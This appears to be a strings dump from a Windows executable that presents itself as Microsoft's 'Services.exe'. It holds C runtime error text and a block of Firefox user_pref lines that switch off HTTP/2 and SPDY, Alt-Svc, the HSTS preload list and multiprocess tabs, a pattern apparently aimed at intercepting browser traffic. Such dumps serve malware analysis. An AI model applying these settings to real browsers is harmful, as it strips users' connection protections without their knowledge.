network.http.spdy.enabled.v3
user_pref("network.http.spdy.enabled.v3", false);
network.http.spdy.enabled
user_pref("network.http.spdy.enabled", false);
browser.tabs.remote.autostart
user_pref("browser.tabs.remote.autostart", false);
browser.tabs.remote.autostart.2
user_pref("browser.tabs.remote.autostart.2", false);
gfx.direct2d.disabled
user_pref("gfx.direct2d.disabled", true);
layers.acceleration.disabled
user_pref("layers.acceleration.disabled", true);
network.stricttransportsecurity.preloadlist
user_pref("network.stricttransportsecurity.preloadlist", false);
user_pref("network.http.altsvc.enabled", false);
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.http2", false);
user_pref("network.http.spdy.enabled.http2draft", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.http2", false);
user_pref("network.http.spdy.enabled.http2draft", false);
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
Amscoree.dll
@R6002
- floating point support not loaded
- not enough space for arguments
- not enough space for environment
- abort() has been called
- not enough space for thread data
- unexpected multithread lock error
- unexpected heap error
- unable to open console device
- not enough space for _onexit/atexit table
- pure virtual function call
- not enough space for stdio initialization
- not enough space for lowio initialization
- unable to initialize heap
- CRT not initialized
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- not enough space for locale information
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- inconsistent onexit begin-end variables
DOMAIN error
SING error
TLOSS error
runtime error
Runtime Error!
Program:
<program name unknown>
Microsoft Visual C++ Runtime Library
dkernel32.dll
@ja-JP
USER32.DLL
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
h(((( H
H
CONOUT$
NIKMOK
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Microsoft
FileDescription
Services.exe
FileVersion
1.0.0.1
InternalName
Services.exe
LegalCopyright
Copyright (C) 2024
OriginalFilename
Services.exe
ProductName
Services.exe
ProductVersion
1.0.0.1
VarFileInfo
Translation